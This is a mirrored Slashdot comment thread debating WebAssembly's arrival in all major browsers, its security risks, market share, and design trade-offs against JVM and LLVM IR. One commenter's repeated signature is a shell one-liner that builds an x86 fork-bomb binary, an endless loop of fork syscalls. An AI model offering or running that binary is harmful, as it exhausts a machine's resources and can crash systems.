Slashdot Mirror
All Major Browsers Now Support WebAssembly (bleepingcomputer.com)
An anonymous reader writes: "It took only two years for all browser vendors to get on the same page regarding the new WebAssembly standard, and as of October 2017, all major browsers support it," reports Bleeping Computer. Project spearheads Firefox and Chrome were the first major browsers to graduate WebAssembly from preview versions to their respective stable branches over the summer. The second wave followed in the following weeks when Chromium-based browsers like Opera and Vivaldi also rolled out the feature as soon as it was added to the Chromium stable version. The last ones to ship WebAssembly in the stable branches were Apple in Safari 11.0 and Microsoft in Microsoft Edge (EdgeHTML 16), which is the version that shipped with the Windows 10 Fall Creators Update. Both were released last month. WebAssembly, or wasm, is a bytecode format for the web, allowing developers to send JavaScript code to browsers in smaller sizes, but also to compile from C/C++/Rust to wasm directly.
Better to get content from the source. BleepingComputer appears to just read Mozilla blogs and repackage them as its own. Here's the original Mozilla blog post.
nobody wants your hosts file generator
Already about 1/2 of web pages I can only get to work by using "view source" and clipping out links from the source which for some idiotic reason the site wants to demand javascript to do something that pure HTML could do just fine, such as display an image or move to another URL when you click on the link.
Can't wait until that has yet another layer of obscuration due to WebAssem.
The modern web's idiocy only ever grows larger and larger. Can't wait for WebAssem based obscuring images over the text you're trying to read, or more obscured privacy obliterations or the like. At least firefox will have a way to shut that idiocy off.
Let's be honest with ourselves here, as of late 2017 the only browsers that matter are Chrome and Safari. Together they have about 85% of the entire market. IE/Edge comes next. Firefox, Opera and Vivaldi barely register.
Chrome, and to a lesser extent Safari, define what the web is. If they don't support a web technology, it effectively does not exist. If they support a technology, it's a standard.
Wasm's success will be fully determined by how well Chrome and Safari support it. It doesn't really matter if Firefox does or doesn't support it. Firefox's 2% or 3% of the market doesn't matter at all.
Firefox, Opera and Vivaldi barely register.
So change that. Apathy is useless. Use Firefox or Opera or Vivaldi.
Firefox's 2% or 3% of the market doesn't matter at all.
Firefox is currently the 3rd most popular, with 13% market share. source.
It's not much use until the vast majority of users have adopted these compatible browser versions.
Not being intentionally negative, but how long will this take in reality?
Never happened. True story.
Is this a good or bad thing for the end-user, meaning *me*, and, if not good, how do I disable it?
It must have been something you assimilated. . . .
Can I write a program in C++ and just compile to WASM like I do to X86 or ARM or do I need to use certain libraries to ensure it will function properly?
That's the desktop browser share, but the majority of Internet browsing has been on mobile for several years now, so citing desktop numbers without providing any context is rather disingenuous.
When you look at overall browser usage, Firefox falls back to 4th with a 6-7% share (behind either IE or a Chinese mobile browser I had never heard of), depending on whose numbers you use. And regardless of whose numbers you use, Chrome + Safari account for about 2/3 of all browser usage (with Chrome alone accounting for about 1/2).
MOD THE PARENT DOWN! You're ignoring the mobile market, which now makes up about 65% of all web users. This market is dominated by Chrome and Safari. Firefox has almost no penetration of the mobile market. When we look at the entire web market, Firefox is around 2% to 3%. That percentage will drop once Firefox 57 is released, which will break a lot of extensions, which will drive Firefox users to alternative browsers. Most will end up using Chrome or Safari, further cementing their dominance. Firefox could be below 1% by the end of 2018.
This is way too coherent to be the real APK. And missing the barrage of links to questionable pages. Fail.
Which is a shame, because webasm is what it is because of mozillas asm.js
They really had the right approach and it won.
I say this using firefox at work and often wishing it was chrome (default search and printing suck on FF).
Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg
What most people don't realize is webassembly is just a way to obfuscate the web in the same manner people already obfuscate compiler binaries.
Furthermore it will lead to integrated 'all in one' scripts that cannot be easily disentangled, making it harder for end users to filter what scripts on a website they are running.
Additionally it no doubt has engineered defects in it to help national intelligence apparatus' to more easily exploit target browsers, while also providing fingerprint opportunities far more opaque than even current browsers capabilities to deanonymize you.
Think twice before you let webassembly ruin the web for you!
Yes. This sounds an awful lot like browser-based java virtual machine circa 1995. Good to see its time has finally come, in that people are now actually ready for the concept.
Back then, arguably, it was mainly Microsoft that killed it by not allowing Sun's technology into Internet Explorer without insisting on mangling it to a non-interoperable version.
Good that there are some saner heads prevailing for try number two.
Where are we going and why are we in a handbasket?
Opera committed seppuku when they changed their rendering engine to Chromium and lost all the features that made Opera worth using.
https://www.reddit.com/r/opera...
If you're going to use a Chromium based browser, why not just use Chrome?
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
FTSubmission: WebAssembly, or wasm, is a bytecode format for the web, allowing developers to send JavaScript code to browsers in smaller sizes, but also to compile from C/C++/Rust to wasm directly.
[emphasis mine]
Who wants websites running arbitrary C code on their machines? C is a real programming language. Probably the flagship used for most of the software you buy. It is powerful and widely known. So why let any old website that you visit execute code, probably in the background, on their own machine?
I see lots more 'sploits coming down the pipe as wasm is implemented. With real languages at their fingertips, tons of unaware users who will effectively let anyone have access to their electricity and CPU time without even knowing.
This just swings the door wide-open for a flood of Trojan code, actual code, not JS, all over the web running who-knows-what bit-miner, or distributed child-porn torrent node, or who knows what? It's like a giant, anonymous Beowulf cluster capability (where you lose). . . on top of all of those "Punch the Monkey" Ads suddenly freed to fly around over the text you're trying to read... or constantly right under you pointer, like a big Ad-flag hanging there permanently while on the offending site.
Wait, Tabs aren't sand-boxed similarly to browser windows... Are they? I hope so.
Many people think that the browser IS the internet!
There will be chaos.
Wasn't it Oracle that finally killed the Java applet? At least, my web browsers happily ran Java applets for a number of years, until Oracle took over Java and suddenly every web browser started refusing to run applets, even when you begged it to.
I don't care if it's 90,000 hectares. That lake was not my doing.
jslinux?
The idea is much older. What about native java bytecode CPUs?
great news for spyware developers, advertisers, and websites who think they have a right to spy on their visitors.
shit news for actual humans.
Nobody seriously praises Rust.
Linus Torvalds would turn over in his grave, if he was dead.
lucm, indeed.
Stable and universal webassembly would be already enough to do it. You can just write app in whatever language you want and cross compile it. There are already quite big apps on the web that are created this way (ported to js from mobile by cross compiling).
It will be many many many years just like with IE 6 before you can use modern standards if IE is still on any corporate desktop.
http://saveie6.com/
slashdot still works in w3m
https://en.wikipedia.org/wiki/...
I think Web Assembly is a tremendous mistake.
This will end up being nothing more than an insecure vector for people you don't know to run programs on your computer.
1) It claims to be secure by only executing in a sandbox. Have other attempts at sandboxing had security flaws?
2) Assuming the sandboxing works as advertized, is there a way for the sandboxing to break the sandbox in ways the coders hadn't considered? (Such as periodically using a lot/little CPU time or memory as a way to communicate to a different tab?)
3) Can Web Assembly be used to steal CPU cycles, so your computer can be used for BitCoin mining or anything else while visiting a web page? (And no, that they can do this already doesn't invalidate the argument.)
4) Does Web Assembly add a level of obfuscation to the code, making it harder to see what it's doing?
We once had a period where E-mail attachments were automatically opened and run, where Excel macros activate when a spreadsheet is viewed, and where myriad ActiveX libraries were available for use by anyone.
Anyone remember that era?
We've locked down the ability to install and run programs on our computers, but now we've moved the goalposts. Our browser will now download and run programs for us from any random website, any website that contracts out to an agency to supply advertizing, and and website advertizing contractor who doesn't vet his clients.
"Oh, we're so sorry! That malware delivery got through our vetting process. We've terminated that one client, please feel safe downloading the ads from all of our other clients - they're clean. Pinky swear! :-)"
For the next 10 years expect to see a steady stream of exploits and patches. A mini industry will crop up selling antivirus checkers for web pages, and AdBlock extensions for browsers.
It's deja vu all over again.
webasm is great for advertisers, and media companies.
not so much for users...
They aren't the ones that matter to me. I find the Firefox the best current browser with Konqueror as an abysmal second best.
But I don't follow web standards. "What the hell is \"Web Assembly\"?", "Why should I care?", and "How can I disable it?" are the three major questions that pop into my mind. Presumably there'll be some way to disable it. My feeling is that the web has been going downhill ever since they introduced JavaScript. I already run a script blocker on most sites, and if I can't see the site through the script blocker, I'll usually just skip it.
I think we've pushed this "anyone can grow up to be president" thing too far.
All web browsers support the new FLASH?!?!?!?!11
Fuck yeah, what could possibly go wrong?!?!??!11
And Chrome is just Chromium. And Chromium is just Blink. And Blink is just Webkit. And Safari is just Webkit. And Webkit is just KHTML. And Konqueror is just KHTML. And KHTML is just KParts... PATHETIC!
Because Opera is 1) more stable, 2) has more features. Built in ad-block without any add-ons. Built in VPN without any add-ons. Built in communication tools without any add-ons.
Google shoves blind A/B tests to live end-user clients without any notification or sign-ups whatsoever. I've had this break countless times in a corporate environment and spent days debugging this shit. One time they changed the DNS resolver code on a hand full of "test" users to an implementation that took 60+ seconds to resolve DNS addresses. Luckily, I found a buried post on the Google Help forums which described this broken behavior and which setting to disable in the chrome://flags window. But even that window just lists things as "default", not "FORCED ENABLED FOR A/B TESTING". There is literally no way to tell if you're in a test or not. And more recently, they absolutely broke printer support for a month or two, killing all web based invoicing one of my clients was doing.
Opera? They wait for things to stabilize, then port them over to their browser. Its literally just been night and day in terms of stability switching off of Chrome and moving 100% full time over to Opera.
I couldn't find any browser plugins that block Web Assembly.
I also couldn't find any way to disable it through settings or about:config in Chrome or Chromium.
Any tips? Is anyone working on this?
Praise be to Rust, for if it were not then those users might make a better choice, and be underfoot.
Chrome is available on a smaller set of platforms. That's my excuse, anyway. But Chromium sucks anyway because it's not 100% compatible.
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
How to disable it?
Use your browser's available settings (and/or argue with your browser vendor to put them in).
How to develop for it?
Run emscripten on your existing C codebase.
Or any of a thousand compilers that compile to WebAssembly just the same.
Pretty much it's the "JVM" of today, that can be targeted by almost anything.
It only appears so at first glance. WebAssembly is a logical continuation of asm.js, which based on experience of developing of high-performance JavaScript engines. The goal of WebAssembly is to use existing Javascript engines to archive close to C performance within browsers, i.e. something that asm.js already does to lesser degree. In contrast, Java VM was developed to run independently from web browsers, and though you can run it inside a web browser, it's not integrated nearly as well with the browser.
In many ways, WebAssembly is very different than JavaVM. For instance, WebAssembly does not have a GC, while JavaVM relies on it. WebAssembly allows only structured control flow, while you can have an arbitrary control flow in Java. (The restriction on the control flow makes validator for WebAssemply bytecode rather trivial, which helps both with loading speed and security.)
In short, WebAssembly is a VM developed with web browsers in mind, while JavaVM was developed with different priorities.
It wouldn't have been possible for Javascript because Javascript is not fast enough for that to ever make a profit. Relying on protection from malware by being that slow is like using Windows 98 on a 286 because it's too slow and too old to run any modern malware program. Not a very good method of security.
"Set a man a fire, he'll be warm for the rest of the night. Set a man afire, he'll be warm for the rest of his life."
And they started so well.
Initial idea of their parent project was to replace interpreted stuff with native code where possible and low-level intermediate code where it isn't ( that could be trenslated without much CPU effort).
This means that browser would host basically just a VM machine, where it would run the code, natively in most cases.
What it evolved into was just another mix of java/script...
Who needs that ?
Comment removed based on user account deletion
I used to use Opera up to 12.x. Then they moved over to Chromium and it lost all the features. I moved to Chrome and to be honest Chrome is fine on OS-X and Windows. On Android I use Samsung Internet because it has ad blocking which mobile Chrome lacks.
For desktop OSs I like Chrome and a bunch of extensions including uBlock Origin, Floating For Youtube and so on. It's got a lot more bloated than it was when I switched over, possibly due to all the extensions you need. But it's OK on a machine with an SSD and lots of Ram.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Has anyone tested if there are actually any benefits compared to just zipping up the js file and send that? This kind of wire format has actually been done before in WAP with horibble results. The problem with this approach is that you are hard coding the wire format to the data format, so if you add new data definitions you must also change the transfer format.
But what is actually worse is that this adds little benefit or possibly worse to just using a generic compressor like zip instead. So instead of getting the best of both worlds: Compression and independent wire format, you get the worst of everything: New compression format that has not been tested very much and tigthly coupled wire format.
I'm going to continue using the Host File Engine. Your software is well written, functional. The Host File Engine performs exactly as promised by mmell
his hosts program is actually pretty good by xenotransplant
his hosts tool is actually useful for those cases in which one does indeed want to locally block stuff outright while consuming minimum system resources by alexgieg
(APK's) work, I've flat out said it's good by BronsCon
I've tried his hosts file generating software. It works by bmo
APK your posts on this & the hosts file posts, and more, have never been in error &/or bad advice by BlueStrat
Your premise that hostfiles are a good way to deal with advertising & malvertising is quite valid by JazzLad
I like your host file system by Karmashock
(NEED MORE? Ask!)
* It's recommended/hosted by Malwarebytes' hpHosts!
APK
P.S.=> China imitated me http://www.theregister.co.uk/2017/04/26/boffins_supercharge_the_hosts_file_to_save_users_plagued_by_dns_outages/ ... apk
WebAssembly is explicitly designed to be separate from a web browser. The working group is actively seeking non-web uses and has not provided DOM integration in the first versions (you must go via JavaScript to touch the DOM). Oh and the restriction on flow control in WebAssembly is brain dead: validating CFI for arbitrary graphs of basic blocks is a solved problem and was a decade ago, but trying to compile a C codebase using goto or some of the more interesting variations on a switch statement into WebAssembly requires O(n^2) algorithms and potentially an O(n^2) increase in bytecode size, which the WebAssembly JIT has to then undo to be able to generate something whose performance doesn't suck.
I am TheRaven on Soylent News
I was "into" Java, back then. I just didn't think anybody here would remember.
Jazelle was quite popular on mobile platforms (under 2MB of RAM). It ran the common Java bytecodes natively (arithmetic, local flow control), but called out to the VM for things like virtual dispatch. It provided a pretty good intermediate, but was largely overshadowed by JITs (if you're doing any optimisation, you're translating from Java bytecode into something else and generating native ARM code from that was usually easier than translating it back into Java bytecode).
. I would have no problem with WebAssembly, if it was independent of the browser/web world. Which I'm predicting it will move to.
It is an explicit goal of the wasm working group to have non-browser uses.
I'm wondering though, why they didn't just go with some low-level LLVM intermediary?
Because they included some people with PNaCl experience who had learned the hard way how bad an idea this is. LLVM IR is a target-specific compiler IR, it is explicitly not intended as a distribution format. Everyone (PNaCl, SPIR, and so on) who tries it eventually learns that it's a bad idea.
Or use another good existing bytecode. Hell, using the JVM would have been a fun idea.
Java bytecode is pretty closely coupled to the Java language and it's surprisingly painful to get it to work with other languages. CLR bytecode is better, but still not a great fit if you want to support languages with pointer arithmetic and no GC (I suppose you could do the asm.js thing and just allocate a huge buffer object and make pointers offsets into it, but that's pretty ugly. Mind you, it's not far off what wasm does).
But then I'm remembering this is the WhatTheFuckWG we're talking about.
Given the experience of the various people involved, it's pretty impressive how bad most of their design choices were. For example, pointers are integers (as an explicit choice in the IR, not as an implementation detail of a back end), so you can never use memory-safe hardware or later add GC, or to support function pointers without look-aside tables. The IR is stack-based (good for interpreters, bad for compilers, and supporting interpreters was an explicit non-goal). No non-reduceible control flow (so the verifier is marginally simpler, but life is harder for front ends and optimisers). Enforced stack discipline (so supporting non-C languages is quite challenging). Oh, and now they're thinking of adding vectors by picking a fixed-size vector, rather than the sane thing of letting front ends describe arbitrary sized vectors that match the exposed parallelism and letting optimisers roll them into loops for narrower targets.
I am TheRaven on Soylent News
Why would you do cryptocurrency mining in JavaScript on the CPU, when JavaScript implies WebCL and WebGL and lets you offload to the GPU?
I am TheRaven on Soylent News
Let's be honest with ourselves here, as of late 2017 the only browsers that matter are Chrome and Safari. Together they have about 85% of the entire market. IE/Edge comes next. Firefox, Opera and Vivaldi barely register.
I've heard that before.
Except it was IE4. IE3 users can just upgrade. IE5 users are f**ked. And everyone else can go away.
Then we rewrote everything for IE5.
So it was IE5. IE4 users can just upgrade. IE6 users are f**ked. And everyone else can go away.
By the time we were to rewrite everything to IE6, somebody figured out that if we stuck to standards, we could mostly support everyone, AND avoid this annoying rewriting everything every two years.
Internet Explorer fans learned their lesson. When will Chrome fans be as wise as IE fans?
I remember when IE was the only one that mattered, so I'll just sit and wait, because this will change in time, again. And I'll still be using Firefox, from Mozilla, from Netscape, from NCSA's browser...
--#
Of course this
console.log("Hello world");
once obfuscated
var _0xa9ff=['log','Hello\x20world'];(function(_0x50318f,_0x347f74){var _0x4aa6cf=function(_0x1a665d){while(--_0x1a665d){_0x50318f['push'](_0x50318f['shift']());}};_0x4aa6cf(++_0x347f74);}(_0xa9ff,0xaa));var _0xfa9f=function(_0x276a74,_0x406450){_0x276a74=_0x276a74-0x0;var _0x534cc5=_0xa9ff[_0x276a74];return _0x534cc5;};console[_0xfa9f('0x0')](_0xfa9f('0x1'));
is much more readable.
Slashdot, fix the reply notifications... You won't get away with it...
It seems that every new feature carries along a vulnerability.
The reason I use Firefox instead of Chrome has nothing to do with its rendering engine, I'd still use Firefox even if it did change to Blink. I use Firefox because the UI is much better. From seperate search/URL boxes, to minimum tab sizes and the use of scrolling to handle tab overflows, the UI is just orders of magnitude better than Chrome.
Ironically, Mozilla seems to agree with you. They're changing the UI to look more and more like Chrome's with each release. But not changing the rendering engine. When they finish, I'll go over to Chrome, because Blink is better than Gecko.
You are not alone. This is not normal. None of this is normal.
Chrome on Mobile is a completely different experience to Chrome on Desktop for both users and developers alike. The fact the two share code barely factors into anything.
If you're talking "market share", then you should provide context. Adding all versions of things called Chrome across two or three distinctly different types of technology and comparing it to a desktop browser is useless for the sake of comparison.
You are not alone. This is not normal. None of this is normal.
But not changing the rendering engine.
That isn't the case. You should read about the changes in 57 and the changes to come
The idea is much older. What about the the Pascal MicroEngine, which executed p-code?
Just junk food for thought...
No it is not
The dangers of excessive individualism are nothing compared to the oppressiveness of excessive collectivism
Running on a few ing on your finger, no less
The dangers of excessive individualism are nothing compared to the oppressiveness of excessive collectivism
A ring i meant. Thank you spell checker:(
The dangers of excessive individualism are nothing compared to the oppressiveness of excessive collectivism
I thought it was chrome over 50% then firefox follow by ie and lastly opera, vivaldi, and safari where all lumped into other
I only get around 600% CPU issue (3 HT cores fully busy) for the framerate of around 20 fps in that tanks demo. WAY TO GO!
CLI paste? paste.pr0.tips!
s/issue/usage/ too
CLI paste? paste.pr0.tips!
In the context of LLVM, JVM, CLR, and WebAssembly, IR means intermediate representation:
Not open sourcing your generator thing is self-censorship. If you are really so dead set against censorship practice what you preach.
Why would I use a closed-source browser from a company whose entire business model is to spy on users in order to figure out what sort of mind control ("advertising") is most effective on them? Chromium at least is free software; Chrome is a deal with the devil.
Tom Swiss | the infamous tms | my blog
You cannot wash away blood with blood
HTML5 and CSS3 will offer everything the web user needs.
With only HTML5 and CSS3, how do you build a collaborative real-time whiteboard application? A server-side image map can capture the coordinates of clicks:
But ismap cannot capture drags. Would you require the user to draw a curve as a polyline by clicking, waiting for a full page reload, clicking, waiting for a full page reload, clicking, waiting for a full page reload, etc.?
HTML can handle most of what all these new fangled code representations are pressed into service to do. Facebook breaks saving media to the hard drive more often than not. It's not entirely Facebook's fault, because the browser knows what's what and could provide a useful context menu option to save.
Interesting... I have to say I wasn't overly impressed by the bits of wasm implementation I saw when it was first announced. Sounds like they have gotten further along but also made a few mistakes along the way. Like the JVM not having unsigned ints, little things like that can have really icky consequences when the rubber hits the road.
I wonder if the control flow prohibition is cultural or technical baggage from the "I have an axe so every problem fits in a tree structure" DOM shortcomings.
Someone had to do it.
we will no longer be able to monitor and audit the content of web pages and the scripts
Then use one of the following Firefox extensions developed by the GNU project to block running JavaScript that you can't audit.
I imagine that once WebAssembly becomes widespread, LibreJS 7.0 alpha will be updated to cover WebAssembly as well.
Safari 11 which requires the latest version of macOS, unlike Chrome which happily runs on OS X 10.9.5, the last true version of OS X before it all turned into iOS-like crap with a dead-flat user interface, nearly-identical pastel colours everywhere and unreadable fonts unless if you're over 20.
#DeleteFacebook
Well, OK, not changing the rendering engine to something other people are using. Yeah, I was aware of Quantum.
You are not alone. This is not normal. None of this is normal.
Well I meant "rather than Opera" rather than "rather than Chromium".
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
I've tried the mobile versions of Firefox but never really liked it. Same with the mobile version of Opera and Dolphin Browser. I noticed Samsung's browser just got updated to a version with Ad Block and gave it a try.
I.e. IMO right now on Android
Samsung>Chrome>(Firefox,Opera)
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
I suspect that it's largely a requirement to be easy to implement in JavaScript (their incremental deployment model involves providing an inefficient but working JavaScript implementation). JavaScript doesn't allow non-reduceable control flow, so you need to expand it (you can do so, but by copying all of the possible control flow paths into things enabled with flags, which can end up with lots of code duplication).
I am TheRaven on Soylent News
JavaScript implies WebCL and WebGL
Not if creation of a WebGL context fails due to lack of driver support. This is often the case on a netbook or used ThinkPad with Intel GMA, which is limited to OpenGL 1.4.
That was my problem with Opera. Back in the 12.x days it had a better UI than Firefox and Chrome. Once they switched to the Chromium rendering engine they ended up with an even more feature free UI than Chrome plus a bunch of extensions.
The first version of Opera with the Chrome rendering engine didn't even have bookmarks. 12.x had loads of cool features. Even Chrome with a bunch of extensions isn't as good to be honest. But hey, it's a webbrowser and it does the job, albeit using more memory and with a less advanced UI than Opera 12 had five years ago.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The working group is actively seeking non-web uses and has not provided DOM integration in the first versions (you must go via JavaScript to touch the DOM).
Emscripten allows to integrate this javascript directly in your C++ code, so touching DOM from C++ is not a real problem.
validating CFI for arbitrary graphs of basic blocks is a solved problem and was a decade ago,
AFAIK, the Java bytecode verificator does not handle some corner cases, and it is so complicated that it may contain security bugs. So I would not say that the problem is solved in general...
but trying to compile a C codebase using goto or some of the more interesting variations on a switch statement into WebAssembly requires O(n^2) algorithms and potentially an O(n^2) increase in bytecode size, which the WebAssembly JIT has to then undo to be able to generate something whose performance doesn't suck.
WebAssembly requires the compiler to do a bit more work, but it makes the verificator much simpler and faster. If practice shows that WebAssembly does not handle switch statements well enough, WebAssembly can be extended in the future to handle it as a special case. I see no reason to support arbitrary graphs.
With only HTML5 and CSS3, how do you build a collaborative real-time whiteboard application?
you don't because that's a desktop application
Good luck running a desktop application for Mac on a Windows PC, or on a GNU/Linux PC, or on an iPhone or iPad, or on an Android phone or Android tablet. The advantage of a web application is that it reaches users of more than just one operating system.
How is the "right approach" to run compiled code on my machine whenever a random person on the internet asks? At the very least JS, even minimized, is source code that can be opened and read.
Your ad here. Ask me how!
I have no opinion on the rightness of running compiled code in a sandbox. I would think having one place doing it rather than every plugin is safer, but I don't really know.
I was more speaking to it being the right approach to run compiled code.
Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg
May I ask though, isn't it just a subset of JS (I thought that was the point of ask.js)?
If so, is it really any riskier?
Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg
Heh, I still use the 5-year old browser (v12.14) as my main surfing tool ('using it to post this). Alas, it has trouble with more and more websites as time goes on, forcing me to bail on the website (and somehow I still live!) or temporarily switch to some modern tab-based browser the hipsters use. :)
Problem is what about security? Opera 12.x hasn't been updated in ages. I mean you can make an argument that no one cares about it because has such a low share of the market but I'm wary of relying on that.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Please go on defending the multi-platform advantage of web browsers, though. Web apps have literally nothing else to recommend them.
On platforms with a monopoly app store, such as iOS, Windows 10 S, and game consoles, the platform's owner cens^W curates its own app store. It's generally not quite as interested in cens^W curating web applications. Thus an app whose content that violates Apple's App Store Review Guidelines can be published either as a web application or not at all.
Here's why you probably ducked.
Distributing a Qt app to an audience of comparable size to that of a web app requires the developer to make and publish six executable forms of each app: Win32 (Windows 7-10), UWP (Windows 10 and 10 S), macOS, X11/Linux, iOS, and Android. For a 1- or 2-man micro-ISV, reaching all platforms can prove so expensive and time-consuming that the developer is likely to settle for the tradeoff of deliberately limiting his market by not shipping an executable at all for one or more minority platforms. And even then, Chrome OS and game consoles with a web browser are still left out.
Would you consider it reasonable for a developer to offer use of a web app without charge but paywall the Qt app in order to cover the cost of maintaining executable forms of the Qt app for all six major desktop and mobile platforms?
APK Template on the nose!
How's life in the hypocrite lane?
WebCL isn't supported in any browser, and neither are WebGL computer-shaders, but from a quick search it looks like some enterprising hackers have managed to leverage WebGL for compute, even including bitcoin mining.
We will be able to dump horrible Javascript language and use any other language that have a WebAssembly compiler (Python, Java, Ruby, Haskell, ...). I said the only great news because WebAssembly is just a new security nigthmare to come...
Will $CURRENT_YEAR be the year of the Linux Desktop?
I wonder... you seem to know your stuff pretty well. Have you ever designed something like that? Perhaps for fun? For your own usage? Because I would like to see that, and try it out. I'd support you. :)
I did, but before I knew most of the useful things that I know now and it made far more terrible mistakes than WebAssembly (which, for all it faults, is something that is probably easier to make fast than JavaScript). I don't think I ever put it online, so I'm probably safe from anyone finding it and pointing and laughing too hard.
My research area is cross-language interoperability, so this is the kind of thing I look at quite a lot. I'm interested in what the core building blocks are for different kinds of language and which ones should be provided as hardware functionality, OS features, or libraries. Most recently, I've been working on a set of architectural extensions for fine-grained memory safety, which lets you have languages like C and Java in the same address space without the C code being able to trample over the invariants that the Java code depends on.
I am TheRaven on Soylent News
Thanks for the analysis here - sounds like another SPIR-like trainwreck.
Is there any winning when it comes to memory-management? As in, an IR that works nicely for both GC'ed an non-GC'ed memory-management?
As you say, it's awkward to shoehorn manual memory-management onto the JVM, and it's also awkward going the other way - LLVM is known for being an amazing platform but hard to use with GC.
The D programming language is just about the only source language I can think of that has decent support for both models, but of course, it's not an IR.
Is there any winning when it comes to memory-management? As in, an IR that works nicely for both GC'ed an non-GC'ed memory-management?
The requirements for GC are pretty simple: you must be able to identify pointers, updates to pointers must be atomic, and pointers must not be materialised from integers. For efficiency, you might want read or write barriers, but if you have this data in your IR then you can insert these depending on what your GC requires. If you keep those in your IR, so that things like intptr_t are implemented as tagged unions of a pointer and an integer and carry their pointerness around with them, then you can implement it. It's also possible for an IR to support safe and unsafe pointers (I think the CLR can do this, but I've not looked in detail), so the non-GC'd pointers are just offsets into a large heap and the GC'd pointers require some special handling. That's basically the model that WebAssembly has anyway: pointers are actually relative to a region, so different libraries can have private heaps and pointers into them, which isn't really different from having a bunch of TypedArray JavaScript objects and using offsets in them as non-GC'd pointers.
As you say, it's awkward to shoehorn manual memory-management onto the JVM, and it's also awkward going the other way - LLVM is known for being an amazing platform but hard to use with GC.
There are two conflated issues here. LLVM is bad for GC both because it didn't have any real notion of GC and because most of the optimisers didn't think about GC. The new safepoint stuff lets Azul have a high-performance accurate GC. It basically looks like a function call that identifies all of the variables that are meant to be live, and allows them to be relocated. LLVM IR is now pretty GC-friendly, it's just that some of the optimisation passes are not (in particular, we and Azul both had to do some things to ensure that it didn't try to insert integer-to-pointer casts in unexpected places).
I am TheRaven on Soylent News
you must be able to identify pointers, updates to pointers must be atomic, and pointers must not be materialised from integers
If you want to support pointer-arithmetic and GC in the same context, you could do it by differentiating the GC kind of pointer ('references', if you like) from non-GC pointers, right? Again I think D supports this - you can do malloc/free and implement XOR linked lists, and you can do GC'able objects, in the same process. I think the type system prevents anything too awful from happening, as pointer arithmetic isn't allowed on (GC'ed) references and the two kinds aren't convertible.
pointers are actually relative to a region, so different libraries can have private heaps and pointers into them
Sounds like region-based memory management, in a sense.
If you want to support pointer-arithmetic and GC in the same context, you could do it by differentiating the GC kind of pointer ('references', if you like) from non-GC pointers, right?
Pointer arithmetic isn't a problem, as long as you can identify that the results are still pointers and you can prevent a pointer from one object becoming another kind. The C implementation that we've built does that - if a pointer goes out of range, it's an out-of-range pointer to the original object, so you can't dereference it until you bring it back in range, but the GC can still find the object that it refers to.
Again I think D supports this - you can do malloc/free and implement XOR linked lists, and you can do GC'able objects, in the same process. I think the type system prevents anything too awful from happening, as pointer arithmetic isn't allowed on (GC'ed) references and the two kinds aren't convertible.
That's fine, as long as you trust the compiler (and any hand-written assembly) to play by the rules. I'm trying to get the million of so lines of a typical optimising compiler out of the TCB for memory safety.
I am TheRaven on Soylent News
Pointer arithmetic isn't a problem, as long as you can identify that the results are still pointers and you can prevent a pointer from one object becoming another kind
Right, as I said.
The C implementation that we've built does that - if a pointer goes out of range, it's an out-of-range pointer to the original object, so you can't dereference it until you bring it back in range, but the GC can still find the object that it refers to.
I don't follow. You mean pointers that point 'intrusively' into members of a struct/elements of an array? I can see that this wouldn't be trivial to deal with - conventional GC'ed languages require the programmer to carry around both the array reference and the index, whereas C has 'intrusive' pointers.
out of the TCB for memory safety
You have me at a disadvantage - 'TCB'?